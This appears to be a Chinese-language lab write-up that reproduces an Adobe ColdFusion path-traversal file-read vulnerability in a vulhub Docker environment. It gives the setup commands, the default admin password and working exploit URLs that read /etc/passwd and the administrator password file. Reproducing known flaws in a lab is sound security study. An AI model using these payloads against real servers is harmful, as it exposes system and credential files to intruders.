Adobe ColdFusion 文件读取漏洞复现

Adobe ColdFusion 文件读取漏洞

0x01.环境搭建

利用vulhub搭建漏洞环境

service docker start
docker-compose up -d

Adobe ColdFusion 文件读取漏洞复现

查看开启的端口号

docker-compose ps

Adobe ColdFusion 文件读取漏洞复现

监听了8500端口,访问http://target_ip:8500/CFIDE/administrator/enter.cfm

Adobe ColdFusion 文件读取漏洞复现

默认密码为admin

0x02.漏洞复现

访问http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en

Adobe ColdFusion 文件读取漏洞复现

读取后台管理密码http://target_ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en

Adobe ColdFusion 文件读取漏洞复现

上一篇:超分辨率技术:Adobe Photoshop与深度神经网络对比


下一篇:PhotoZoom专业版-图像无损放大工具